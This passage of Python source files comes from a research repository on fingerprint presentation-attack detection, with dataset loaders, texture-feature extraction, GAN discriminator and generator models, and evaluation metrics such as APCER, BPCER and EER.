print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Data loaders\n \n params = {'batch_size': batch_size,\n 'shuffle': True,\n 'num_workers': 0} \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\n\n \nIMG_HEIGHT = -1 \nIMG_WIDTH = -1 \n\n\nclass FPAD(Dataset):\n def __init__(self,\n PATH,\n dataset,\n img_size,\n material_idx,\n real_idx,\n croped = True):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n self.croped = croped\n self.img_size = img_size\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0)\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n index_norm = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = PATH + dataset + \"/Fake/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path = PATH + dataset + \"/\" + self.materials[index] + \".txt\"\n else:\n self.fake_dir = PATH + dataset + \"/Fake_c/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path= PATH + dataset + \"/\" + self.materials[index] + \"_c.txt\"\n \n with open(txt_path, 'r') as file:\n fake_names = file.readlines()\n \n count = count + len(fake_names)\n \n X.extend(fake_names)\n y.extend([float(1)]*len(fake_names))\n f.extend([index]*len(fake_names))\n f_norm.extend([index_norm]*len(fake_names))\n\n index_norm = index_norm + 1\n\n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n path = PATH + dataset + \"/real.txt\"\n else:\n path = PATH + dataset + \"/real_c.txt\"\n \n # read real names\n with open(path, 'r') as file:\n real_names = file.readlines()\n \n real_names = np.array(real_names)\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n real_names = real_names[self.real_idx] \n\n X.extend(real_names)\n y.extend([float(0)]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, idx):\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = self.X[idx] \n sample = Image.open(img_name.rstrip())\n width, height = sample.size \n\n dim = self.img_size\n\n if width > height:\n ratio = dim/width\n else:\n ratio = dim/height\n\n new_width = round(width*ratio)\n new_height = round(height*ratio)\n\n sample = sample.resize((new_width, new_height))\n width, height = sample.size\n \n delta_w = dim - width\n delta_h = dim - height\n padding = (delta_w//2, delta_h//2, delta_w-(delta_w//2), delta_h-(delta_h//2))\n sample = ImageOps.expand(sample, padding, 255)\n \n #sample = 255 - np.array(sample)\n sample = np.array(sample)\n \n if self.dataset == \"Digital_Persona\":\n \n sample = sample[:,:,0]\n sample = np.transpose(sample)\n \n sample.reshape((1, sample.shape[0], sample.shape[1]))\n\n transformation = self.transformations()\n \n return transformation(sample).view((1, sample.shape[0], sample.shape[1])), self.y[idx], self.f[idx], self.f_norm[idx]\n \n def transformations(self):\n data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(mean=(0.5,), std=(0.5,))])\n return data_transform" }, { "alpha_fraction": 0.5834094285964966, "alphanum_fraction": 0.5997130274772644, "avg_line_length": 34.3317985534668, "blob_id": "54afa0ac77230beb19dec1ed01186cd3ed1e347c", "content_id": "a3bbd7c7d9b4bf345156985c355157a59c89a342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7667, "license_type": "no_license", "max_line_length": 166, "num_lines": 217, "path": "/MLP/MLP_feature_extraction.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import division\n\nfrom PIL import Image\nimport glob\nfrom skimage import color\nfrom skimage.feature import local_binary_pattern\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score \nfrom sklearn.metrics import roc_curve \nfrom sklearn.metrics import roc_auc_score\nimport math\nimport sys\n\nfrom scipy.signal import convolve2d\n\ndef normalize(x, minimum=-1, maximum=-1):\n min_max = []\n if minimum == -1 or maximum == -1:\n from sklearn.preprocessing import normalize\n norm_x = normalize(x[:,np.newaxis], axis=0).ravel()\n min_max.append(min(norm_x))\n min_max.append(max(norm_x))\n return np.array(min_max), norm_x\n else:\n norm_x=[]\n for i in range(len(x)):\n norm_x.append((x[i]-min(x))/(max(x)-min(x)) * (maximum-minimum) + minimum)\n return np.array(norm_x)\n\ndef lpq(img, winSize=3, freqestim=1, mode='nh'):\n rho=0.90\n\n STFTalpha=1/winSize # alpha in STFT approaches (for Gaussian derivative alpha=1)\n sigmaS=(winSize-1)/4 # Sigma for STFT Gaussian window (applied if freqestim==2)\n sigmaA=8/(winSize-1) # Sigma for Gaussian derivative quadrature filters (applied if freqestim==3)\n\n convmode='valid' # Compute descriptor responses only on part that have full neigborhood. Use 'same' if all pixels are included (extrapolates np.image with zeros).\n\n img=np.float64(img) # Convert np.image to double\n r=(winSize-1)/2 # Get radius from window size\n x=np.arange(-r,r+1)[np.newaxis] # Form spatial coordinates in window\n\n if freqestim==1: # STFT uniform window\n # Basic STFT filters\n w0=np.ones_like(x)\n w1=np.exp(-2*np.pi*x*STFTalpha*1j)\n w2=np.conj(w1)\n\n ## Run filters to compute the frequency response in the four points. Store np.real and np.imaginary parts separately\n # Run first filter\n filterResp1=convolve2d(convolve2d(img,w0.T,convmode),w1,convmode)\n filterResp2=convolve2d(convolve2d(img,w1.T,convmode),w0,convmode)\n filterResp3=convolve2d(convolve2d(img,w1.T,convmode),w1,convmode)\n filterResp4=convolve2d(convolve2d(img,w1.T,convmode),w2,convmode)\n\n # Initilize frequency domain matrix for four frequency coordinates (np.real and np.imaginary parts for each frequency).\n freqResp=np.dstack([filterResp1.real, filterResp1.imag,\n filterResp2.real, filterResp2.imag,\n filterResp3.real, filterResp3.imag,\n filterResp4.real, filterResp4.imag])\n\n ## Perform quantization and compute LPQ codewords\n inds = np.arange(freqResp.shape[2])[np.newaxis,np.newaxis,:]\n LPQdesc=((freqResp>0)*(2**inds)).sum(2)\n\n ## Switch format to uint8 if LPQ code np.image is required as output\n if mode=='im':\n LPQdesc=np.uint8(LPQdesc)\n\n ## Histogram if needed\n if mode=='nh' or mode=='h':\n LPQdesc=np.histogram(LPQdesc.flatten(),range(256))[0]\n\n ## Normalize histogram if needed\n if mode=='nh':\n LPQdesc=LPQdesc/LPQdesc.sum()\n\n return LPQdesc\n\n\ndef featureExtractor(DATASET, croped=False):\n\n PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n \n radius = 1\n n_points = 8 * radius\n METHOD = 'uniform' \n \n if DATASET=='CrossMatch':\n files = '/*.bmp'\n num_img = 500\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n elif DATASET=='Digital_Persona':\n files = '/*.png'\n num_img = 250\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='GreenBit':\n files = '/*.png'\n num_img = 250\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='Hi_Scan':\n files = '/*.bmp'\n num_img = 250\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='Time_Series': #Time_Series\n files = '/*.bmp'\n num_img = 1500\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n if croped == False:\n print(\"\\nExtracting features on {}...\".format(DATASET))\n live_path = '/Live'\n fake_path = '/Fake/'\n seg = 'Without_segmentation/'\n #txt = DATASET + '_withoutSegmentation_Int.txt'\n #txt = DATASET + '_withoutSegmentation_LBP.txt'\n txt = DATASET + '_withoutSegmentation_IntLBP.txt'\n csv = \"\"\n else:\n files = '/*.png'\n print(\"\\nExtracting features of ROI on {}...\".format(DATASET))\n live_path = '/Live_c'\n fake_path = '/Fake_c/'\n seg = 'Segmentation/'\n #txt = DATASET + '_withSegmentation_Int.txt'\n #txt = DATASET + '_withSegmentation_LBP.txt'\n txt = DATASET + '_withSegmentation_IntLBP.txt'\n csv = \"_c\"\n \n \n num_clf = 3 \n num_materials = (len(materials))\n \n F = []\n \n intensity_feature = []\n LBP_feature = []\n LPQ_feature = []\n \n print(\"\\n - Bonafide samples\")\n for filename in glob.glob(PATH + DATASET + live_path + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_feature.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_feature.append(hist2.tolist())\n LPQ_feature.append(lpq(img))\n \n \n intensity_feature = np.array(intensity_feature)\n LBP_feature = np.array(LBP_feature)\n LPQ_feature = np.array(LPQ_feature)\n \n BF = np.hstack((intensity_feature, LBP_feature, LPQ_feature))\n \n for i in range(BF.shape[1]):\n min_max, BF[:,i] = normalize(BF[:,i])\n \n F.append(BF)\n \n \n print(\"\\n - Presentation attack samples\")\n for material in materials:\n print(\"\\n - \" + material)\n intensity_feature = []\n LBP_feature = []\n LPQ_feature = []\n for filename in glob.glob(PATH + DATASET + fake_path + material + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_feature.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_feature.append(hist2.tolist())\n LPQ_feature.append(lpq(img))\n \n intensity_feature = np.array(intensity_feature)\n LBP_feature = np.array(LBP_feature)\n LPQ_feature = np.array(LPQ_feature) \n \n PAI = np.hstack((intensity_feature, LBP_feature, LPQ_feature)) \n \n for i in range(PAI.shape[1]):\n PAI[:,i] = normalize(PAI[:,i], min_max[0], min_max[1])\n \n F.append(PAI)\n \n import pandas as pd \n pd.DataFrame(F[0]).to_csv(DATASET + '_real' + csv + '.csv')\n\n for i in range(1, len(F)):\n pd.DataFrame(F[i]).to_csv(DATASET + '_' + materials[i-1] + csv + '.csv')\n\n\n'''\ndatasets = ['CrossMatch', 'Digital_Persona', 'GreenBit', 'Hi_Scan', 'Time_Series']\n\nfor dataset in datasets:\n featureExtractor(dataset, croped=False)\n\n''' \ndatasets = ['Digital_Persona', 'GreenBit']\n\nfor dataset in datasets:\n featureExtractor(dataset, croped=True)\n" }, { "alpha_fraction": 0.49096301198005676, "alphanum_fraction": 0.5093194246292114, "avg_line_length": 26.445735931396484, "blob_id": "9ab1d05936d15f68b54132ef09109ecfe14900d2", "content_id": "48e8c2afe64f6b26aee7b6af82c7457bc447100c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7082, "license_type": "no_license", "max_line_length": 116, "num_lines": 258, "path": "/II-GAN/utils/evaluation.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\nimport cv2\n\n\n#sys.path.insert(0, 'utils/')\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../models/')\n\nfrom utils import _nanargmin, normal_weights_init\nfrom data import get_data_loaders\nfrom gan import DISCRIMINATOR, GENERATOR\nfrom matcher import MATCHER\n\nloss = nn.BCEWithLogitsLoss()\nsigmoid = nn.Sigmoid()\n\n\ndef eval_model(models, data_loader, device, epoch, num_epochs, matcher_epochs, debug=False, with_generator=True):\n\n matcher_epochs = matcher_epochs + 1\n\n netD, netG = models\n\n with torch.no_grad():\n\n netD.eval()\n netG.eval()\n \n loss_c = 0\n loss_g = 0\n N = 0\n N_fake = 0\n n_correct = 0 \n\n m_score = 0 \n \n for i, (x,y) in enumerate(data_loader, 0):\n \n # (1) Update D network\n \n ## Train with all-real batch\n \n netD.zero_grad()\n netG.zero_grad()\n \n x = x.to(device)\n x_real = x[y == 0]\n x_fake = x[y == 1]\n\n if x_fake.shape[0] < 5:\n continue\n\n\n \n #b_size = real.size(0)\n \n output_real = netD(x_real)\n D_real = torch.round(sigmoid(torch.mean(output_real, dim=(1,2,3))))\n \n real_label = torch.zeros_like(output_real, device=device)\n \n errD_real = loss(output_real, real_label)\n\n ## Train with all-fake batch\n\n if with_generator:\n \n index = [i for i in range(x_fake.shape[0])]\n\n index_to_modify = random.sample(range(x_fake.shape[0]), x_fake.shape[0]//2)\n\n index_to_maintain = [i for i in index if i not in index_to_modify]\n\n x_fake_to_modify = x_fake[index_to_modify,...].clone().detach()\n\n x_fake_to_maintain = x_fake[index_to_maintain,...].clone().detach()\n\n x_fake_to_modify = x_fake_to_modify.to(device)\n\n x_fake_modified = netG(x_fake_to_modify)\n\n x_fake = torch.cat([x_fake_to_maintain, x_fake_modified], dim=0)\n\n if epoch >= num_epochs - matcher_epochs:\n\n try:\n m_score = MATCHER(x_fake_to_modify, x_fake_modified)\n except:\n m_score = 10.0\n\n output_fake = netD(x_fake.detach())\n\n D_fake = torch.round(sigmoid(torch.mean(output_fake, dim=(1,2,3))))\n \n fake_label = torch.ones_like(output_fake, device=device)\n \n errD_fake = loss(output_fake, fake_label)\n\n errD = errD_real + errD_fake\n\n loss_c += errD * x.shape[0]\n\n output_fake = netD(x_fake)\n real_label = torch.zeros_like(output_fake, device=device)\n\n errG = loss(output_fake, real_label)\n \n if epoch >= num_epochs - matcher_epochs:\n errG = errG + m_score\n\n loss_g += errG * x_fake.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n N_fake += x_fake.shape[0]\n\n real_label = torch.zeros_like(D_real, device=device)\n fake_label = torch.ones_like(D_fake, device=device)\n\n n_correct += torch.sum(1.*(D_real == real_label)).item()\n n_correct += torch.sum(1.*(D_fake == fake_label)).item()\n\n loss_c = loss_c / N\n loss_g = loss_g / N_fake\n acc = n_correct / N\n\n return loss_c, loss_g, acc\n\n\nfrom sklearn import metrics\nimport math\n\nloss_fn = nn.BCEWithLogitsLoss()\nsigmoid = nn.Sigmoid()\n\ndef test_model(model, data_loader, device, debug=False):\n\n print(\"\\n\")\n\n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n for i, (x, y) in enumerate(data_loader):\n\n sys.stdout.write(\"\\r\" + 'Testing classifier... {}-th test batch'.format(i+1))\n\n # send mini-batch to gpu\n x = x.to(device)\n \n y = y.to(device)\n\n y_pred = model(x)\n\n y_pred = torch.mean(y_pred, dim=(1,2,3))\n\n # Compute cnn loss\n loss = loss_fn(y_pred, y)\n loss_eval += loss * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.round(sigmoid(y_pred))\n n_correct += torch.sum(1.*(ypred_ == y)).item()\n \n y = y.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y))\n TN += np.sum(np.logical_and(1-ypred_, 1-y))\n \n FP += np.sum(np.logical_and(ypred_, 1-y))\n FN += np.sum(np.logical_and(1-ypred_, y))\n \n PA += np.sum(y == 0)\n BF += np.sum(y == 1)\n \n probs = F.softmax(y_pred, 0)\n\n probs = probs.cpu().numpy()\n \n fpr, tpr, threshold = metrics.roc_curve(y, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) / (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = -1000000000\n \n return loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n" }, { "alpha_fraction": 0.5385435223579407, "alphanum_fraction": 0.5506216883659363, "avg_line_length": 27.15999984741211, "blob_id": "14d610a5f07e1fd1752169fb44c2e5006e8208a4", "content_id": "b8720c4c22f46fa0a28133c877bdc845ea013664", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "no_license", "max_line_length": 77, "num_lines": 100, "path": "/CNNreg/layers/cnn2_layers.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nfrom torch import Tensor\n\n__negative_slope__ = 0.01\n\n\ndef get_activation_layer(activation):\n ''' Create activation layer '''\n if activation == 'relu':\n return nn.ReLU()\n elif activation == 'leaky_relu':\n return nn.LeakyReLU(__negative_slope__)\n elif activation == 'tanh':\n return nn.Tanh()\n else:\n errmsg = 'Invalid activation'\n raise Exception(errmsg)\n \ndef get_padding(kernel_size):\n ''' Compute padding '''\n if kernel_size % 2:\n padding = kernel_size // 2\n else:\n padding = (kernel_size - 1) // 2\n return padding\n\ndef BasicConvLayer(in_channels,\n out_channels,\n kernel_size,\n stride,\n bnorm=True,\n activation='relu',\n dropout=0.0,\n max_pool=False):\n ''' Create a composed conv layer\n (conv - bnorm - activation - dropout) '''\n # ModuleList of layers (Conv - bnorm - activation - dropout)\n padding = get_padding(kernel_size)\n layers = nn.ModuleList([\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)])\n\n if bnorm:\n layers.extend([nn.BatchNorm2d(out_channels)]) # Bnorm layer\n\n layers.extend([get_activation_layer(activation)]) # activation layer\n\n if dropout > 0.0:\n layers.extend([nn.Dropout2d(dropout)])\n \n if max_pool == True:\n layers.extend([nn.MaxPool2d(kernel_size=2, stride=2)])\n\n # Convert to Sequential\n BasicConv2D = nn.Sequential(*(layers))\n\n return BasicConv2D\n\ndef BasicDenseLayer(in_features,\n out_features,\n bnorm=True,\n activation='linear',\n dropout=0.0):\n ''' Create a composed dense layer\n (Linear - bnorm - activation - dropout) '''\n # ModuleList of layers (Linear - bnorm - activation - dropout)\n layers = nn.ModuleList([\n nn.Linear(in_features, out_features)\n ])\n\n if bnorm:\n layers.extend([nn.BatchNorm1d(out_features)]) # bnorm layer\n\n if activation != 'linear':\n layers.extend([get_activation_layer(activation)]) # activation layer\n\n if dropout > 0.0:\n layers.extend([nn.Dropout(dropout)])\n\n # Convert to Sequential\n BasicDense = nn.Sequential(*(layers))\n\n return BasicDense\n\n\nif __name__ == '__main__':\n\n a = BasicConvLayer(in_channels=1,\n out_channels=64,\n kernel_size=5,\n stride=2,\n bnorm=True,\n activation='relu')\n print(a)\n\n a = BasicDenseLayer(in_features=32,\n out_features=128,\n bnorm=True,\n activation='relu')\n print(a)" }, { "alpha_fraction": 0.4924646317958832, "alphanum_fraction": 0.5355900526046753, "avg_line_length": 28.346939086914062, "blob_id": "e533376120fd81425b33dc0670bd76c8709acd25", "content_id": "78f0c106d90ab1a6fd82d990eef8d307a409fabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4313, "license_type": "no_license", "max_line_length": 133, "num_lines": 147, "path": "/II-GAN/models/gan.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\n\ndim = 128\n\n# Number of channels in the training images.\nnc = 1\n\n# Size of z latent vector (i.e. size of generator input)\nnz = 128\n\nclass Reshape(nn.Module):\n def __init__(self, N, C, H, W):\n super(Reshape, self).__init__()\n self.N = N\n self.C = C\n self.H = H\n self.W = W\n def forward(self, x):\n return x.view(self.N, self.C, self.H, self.W)\n\n\nclass DISCRIMINATOR(nn.Module):\n def __init__(self):\n super(DISCRIMINATOR, self).__init__()\n self.main = nn.Sequential(\n\n nn.Conv2d(1, 64, 3, 1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(64, 64, 3, 2),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(64, 128, 3, 1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(128, 128, 3, 2),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(128, 256, 3, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(256, 256, 3, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(256, 256, 3, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(256, 256, 3, 2),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n Reshape(N=-1, C=23, H=23, W=256),\n nn.Linear(256, 1),\n Reshape(N=-1, C=1, H=23, W=23),\n\n )\n\n def forward(self, input):\n '''\n print(\"DISCRIMINATOR\")\n y = input\n print(input.shape)\n for i in range (len(self.main)):\n y = self.main[i](y)\n print(\"Layer \" + str(i))\n print(y.shape)\n '''\n return self.main(input)\n\n\nclass GENERATOR(nn.Module):\n def __init__(self, features = [64, 64, 64, 64, 64]):\n super(GENERATOR,self).__init__()\n \n conv_layers = []\n deconv_layers = []\n\n conv_layers.append(nn.Sequential(nn.Conv2d(1, features[0], kernel_size=3, stride=2, padding=1),\n nn.LeakyReLU(0.2, inplace=True)))\n for i in range(1, len(features)):\n conv_layers.append(nn.Sequential(nn.Conv2d(features[i-1], features[i], kernel_size=3, padding=1),\n nn.BatchNorm2d(features[i]),\n nn.LeakyReLU(0.2, inplace=True)))\n\n for i in range(len(features)):\n deconv_layers.append(nn.Sequential(nn.ConvTranspose2d(features[i], features[i-1], kernel_size=3, padding=1),\n nn.BatchNorm2d(features[i-1]),\n nn.ReLU(inplace=True)))\n \n deconv_layers.append(nn.Sequential(nn.ConvTranspose2d(features[-1], 1, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.Tanh())) \n \n \n self.encoder = nn.Sequential(*conv_layers)\n self.decoder = nn.Sequential(*deconv_layers)\n \n def forward(self,x):\n x = self.encoder(x)\n x = self.decoder(x)\n return x\n \nif __name__ == '__main__':\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n\n \n D = DISCRIMINATOR().to(DEVICE)\n G = GENERATOR().to(DEVICE)\n\n print(D)\n print(G)\n\n from torchsummary import summary\n\n summary(D, (1, 128, 128))" }, { "alpha_fraction": 0.5934514999389648, "alphanum_fraction": 0.6147236824035645, "avg_line_length": 31.88751792907715, "blob_id": "4ba483150f9e066a7f3dc6149115d1203867ea77", "content_id": "6c526a101eb3e3f1a5aa4bbe4ca329a6dddb2f74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23975, "license_type": "no_license", "max_line_length": 162, "num_lines": 729, "path": "/II-GAN/models/matcher.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 02:51:53 2016\n\n@author: utkarsh\n\"\"\"\n\n\n\n# FREQEST - Estimate fingerprint ridge frequency within image block\n#\n# Function to estimate the fingerprint ridge frequency within a small block\n# of a fingerprint image. This function is used by RIDGEFREQ\n#\n# Usage:\n# freqim = freqest(im, orientim, windsze, minWaveLength, maxWaveLength)\n#\n# Arguments:\n# im - Image block to be processed.\n# orientim - Ridge orientation image of image block.\n# windsze - Window length used to identify peaks. This should be\n# an odd integer, say 3 or 5.\n# minWaveLength, maxWaveLength - Minimum and maximum ridge\n# wavelengths, in pixels, considered acceptable.\n# \n# Returns:\n# freqim - An image block the same size as im with all values\n# set to the estimated ridge spatial frequency. If a\n# ridge frequency cannot be found, or cannot be found\n# within the limits set by min and max Wavlength\n# freqim is set to zeros.\n#\n# Suggested parameters for a 500dpi fingerprint image\n# freqim = freqest(im,orientim, 5, 5, 15);\n#\n# See also: RIDGEFREQ, RIDGEORIENT, RIDGESEGMENT\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\nimport numpy as np\nimport math\nimport scipy.ndimage\n#import cv2\ndef frequest(im,orientim,windsze,minWaveLength,maxWaveLength):\n rows,cols = np.shape(im);\n \n # Find mean orientation within the block. This is done by averaging the\n # sines and cosines of the doubled angles before reconstructing the\n # angle again. This avoids wraparound problems at the origin.\n \n \n cosorient = np.mean(np.cos(2*orientim));\n sinorient = np.mean(np.sin(2*orientim)); \n orient = math.atan2(sinorient,cosorient)/2;\n \n # Rotate the image block so that the ridges are vertical \n \n #ROT_mat = cv2.getRotationMatrix2D((cols/2,rows/2),orient/np.pi*180 + 90,1) \n #rotim = cv2.warpAffine(im,ROT_mat,(cols,rows))\n rotim = scipy.ndimage.rotate(im,orient/np.pi*180 + 90,axes=(1,0),reshape = False,order = 3,mode = 'nearest');\n\n # Now crop the image so that the rotated image does not contain any\n # invalid regions. This prevents the projection down the columns\n # from being mucked up.\n \n cropsze = int(np.fix(rows/np.sqrt(2)));\n offset = int(np.fix((rows-cropsze)/2));\n rotim = rotim[offset:offset+cropsze][:,offset:offset+cropsze];\n \n # Sum down the columns to get a projection of the grey values down\n # the ridges.\n \n proj = np.sum(rotim,axis = 0);\n dilation = scipy.ndimage.grey_dilation(proj, windsze,structure=np.ones(windsze));\n\n temp = np.abs(dilation - proj);\n \n peak_thresh = 2; \n \n maxpts = (temp<peak_thresh) & (proj > np.mean(proj));\n maxind = np.where(maxpts);\n \n rows_maxind,cols_maxind = np.shape(maxind);\n \n # Determine the spatial frequency of the ridges by divinding the\n # distance between the 1st and last peaks by the (No of peaks-1). If no\n # peaks are detected, or the wavelength is outside the allowed bounds,\n # the frequency image is set to 0 \n \n if(cols_maxind<2):\n freqim = np.zeros(im.shape);\n else:\n NoOfPeaks = cols_maxind;\n waveLength = (maxind[0][cols_maxind-1] - maxind[0][0])/(NoOfPeaks - 1);\n if waveLength>=minWaveLength and waveLength<=maxWaveLength:\n freqim = 1/np.double(waveLength) * np.ones(im.shape);\n else:\n freqim = np.zeros(im.shape);\n \n return(freqim);\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 03:15:03 2016\n\n@author: utkarsh\n\"\"\"\n\n\n# RIDGEFILTER - enhances fingerprint image via oriented filters\n#\n# Function to enhance fingerprint image via oriented filters\n#\n# Usage:\n# newim = ridgefilter(im, orientim, freqim, kx, ky, showfilter)\n#\n# Arguments:\n# im - Image to be processed.\n# orientim - Ridge orientation image, obtained from RIDGEORIENT.\n# freqim - Ridge frequency image, obtained from RIDGEFREQ.\n# kx, ky - Scale factors specifying the filter sigma relative\n# to the wavelength of the filter. This is done so\n# that the shapes of the filters are invariant to the\n# scale. kx controls the sigma in the x direction\n# which is along the filter, and hence controls the\n# bandwidth of the filter. ky controls the sigma\n# across the filter and hence controls the\n# orientational selectivity of the filter. A value of\n# 0.5 